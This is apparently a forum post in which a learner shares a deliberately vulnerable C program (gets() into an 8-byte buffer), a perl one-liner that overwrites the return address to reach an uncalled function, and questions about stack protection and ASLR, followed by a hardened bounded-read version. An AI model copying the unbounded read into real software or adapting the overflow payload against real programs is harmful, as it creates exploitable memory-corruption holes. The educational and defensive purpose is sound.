Hello,


For learning purposes I wrote a small program that illustrates a buffer overflow.
There is nothing special in it, no shellcode, no return2libc; the only thing I do is rewrite the return address and jump to another function.
Here is the code:
Code:
#include <stdio.h>
#include <stdlib.h>

/* Target of the overwritten return address; nothing calls it directly. */
void function()
{
    printf("--------------Never called.\n");
}

void f()
{
    char string[8];
    gets(string);   /* deliberately unbounded read: the overflow happens here */
    //printf("REPEAT: %s\n", string);
    //printf("int a: %d, int b: %d\n", a, b);
}

int main()
{
    /* cast so the pointer is printed as an integer; %08X on a raw pointer is undefined */
    printf("Address of function is: %08lX\n", (unsigned long)function);
    f();
    return 0;
}
I am on a 32-bit OS;
I think I need to feed a 16-byte input to the program, and the last 4 bytes will be the new return value.
An example run:
Code:
perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi 
Address of function is: 08048424
--------------Never called.
Here we write 8 bytes to buffer, the next 4 bytes (saved ESP), and then the last 4 bytes, the return address.

My problem / question is:
The above (example) output happens rarely. About once in every ten executions.
The other times I get:
Code:
perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi 
Address of function is: 08048424
Segmentation fault
Once I get:
Code:
perl -e 'print "A" x12; print "\x24\x84\x04\x08"' | ./progi 
Address of function is: 08048424
Illegal instruction
Shouldn't the buffer overflow call the "Never called" function?
I think yes, but I am not sure, so I googled a little and now I think there may be some kind of protection.

My OS:
Debian 6, 32bit.

On the net what I found was:
1) to add -fno-stack-protector to gcc, but nothing changed.
2) "echo 0 > /proc/sys/kernel/randomize_va_space" to turn off the randomization. By default it was 2. The fact is: when I turned it off, the buffer overflow never worked as expected. I don't understand why.

So what do you think, should my example work as I think (the "never called" function is called)? Why does it happen so rarely?
Thanks!
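As an added example (not the poster's code), here is the same f() with the unbounded gets() replaced by a bounded line reader, so the 16-byte input from the post can no longer run past string[8]; the names read_line_bounded and payload_gives are mine, and payload_gives uses a temporary file standing in for stdin so the post's payload can be fed in offline.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 8   /* same size as string[8] in the post */

/* Added example, not the poster's code. Reads one line into buf (at most size-1
   chars plus NUL). Returns 1 if the line fit, 0 if it was longer than the buffer
   (truncated, rest of the line dropped), -1 on EOF with no data. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        if (size) buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';              /* strip the newline, as gets() did */
        return 1;
    }
    int c = fgetc(in);
    if (c == EOF || c == '\n')            /* line ended exactly at capacity */
        return 1;
    while (c != '\n' && c != EOF)         /* over-long line: drop the remainder */
        c = fgetc(in);
    return 0;
}

/* Feeds a constructed payload through a temporary file standing in for stdin;
   returns the reader's result if the string read equals expected, else -99. */
int payload_gives(const char *payload, size_t len, const char *expected)
{
    char buf[BUF_SIZE];
    FILE *tmp = tmpfile();
    if (tmp == NULL) return -99;
    fwrite(payload, 1, len, tmp);
    rewind(tmp);
    int rc = read_line_bounded(buf, sizeof buf, tmp);
    fclose(tmp);
    return strcmp(buf, expected) == 0 ? rc : -99;
}

int main(void)
{
    char string[BUF_SIZE];   /* the hardened f(): same buffer, bounded read */
    /* The post's 16-byte payload: "A" x 12 followed by the 4 address bytes. */
    printf("rc=%d\n", payload_gives("AAAAAAAAAAAA\x24\x84\x04\x08", 16, "AAAAAAA"));
    if (read_line_bounded(string, sizeof string, stdin) == 0)
        fprintf(stderr, "input longer than %d bytes was truncated\n", BUF_SIZE - 1);
    return 0;
}
```

With the post's payload the reader keeps only the first 7 bytes and reports the truncation, which is the event a defender would log; the saved frame pointer and return address are never touched.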